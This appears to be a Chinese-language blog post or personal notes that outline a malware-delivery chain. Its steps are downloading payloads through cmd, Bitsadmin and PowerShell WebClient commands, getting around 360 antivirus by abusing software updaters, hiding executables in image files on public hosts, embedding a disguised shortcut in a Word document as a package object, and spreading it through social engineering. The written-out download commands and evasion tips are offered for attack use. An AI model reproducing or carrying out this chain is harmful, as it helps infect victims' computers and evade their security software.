这个思路要结合近期在一些安全网站上公布的姿势来实现,先科普几个地方。
(1)通过cmd本身就可以直接下载:
Bitsadmin /transfer AA /download /priority normal "http://..." "..."
其实讲道理也可以直接调用Bitsadmin.exe 和cmd没关系。问题是刚刚我测试一发,返现woc 360竟然报毒了?
然后我换了个姿势,直接cmd启动powershell下载:
cmd.exe /c powershell.exe $client = new-object System.Net.WebClient $client.DownloadFile('#1', '#2')
单独直接快捷方式调用powershell下载:
OK这三种方式都不行,看样360已经对这方面做出了处理,我们只能另找其他的方法。刚刚倒腾了好久,找到了解决方案了,可以直接利用第三方软件,比如本机上装了AAA产品,分析发的升级请求调用格式(这个地方有的保护了,有的没保护),然后直接调用他就没事了,不过这个地方就自然引入了一个局限性了呗。但好消息是很多的产品都存在这种漏洞,so...OK就说这么多,我可不想整理个笔记就惹来不好的事。
(2)ok第一个姿势就算普及玩了,虽然是瞬间打脸。第二个是近期又有网站曝光了那个图片藏毒的思路,其实这个思路比较老了,但是目前来说找到这么一个网站还是很容易的,前提是了解一下基本图片文件的格式,然后在不破坏原有格式的前提下混淆东西进去,然后上传到相关网站上。但问题是因为某些限制(像是今天说的这个姿势),我们只能去找可以转存exe文件的那种,或者是dll文件的那种,但是好消息是很容易找到,具体是哪个我不透漏可以自己去找。So文件下载和文件存储问题都搞定了。
(3)然后就是word添加package对象实现类似宏病毒的插入,当然不直接插入一个exe,这次是插入一个快捷方式,创建一个兼容上面1,2的快捷方式。我随便写一个测试的吧,就加入直接调用本地计算器(这个地方扩展很大,可以直接调用本地cmd,powershell,以及已经安装的其他程序,仅仅通过简单的字符串)。
然后添加到word里面的对象->package
之后在简单改下图标啥的,掩护一下。
(4)第四部分,也是最最重要的一个部分,就是通过什么手段去传播,这个地方就考验大家 社会工程学 的能力了,我垃圾,不在这里装逼。哈哈。OK就是这样,把这些东西简单穿一下线,这几个地方是前几天逛一些安全新闻网站看到的。随便总结下。没啥难点。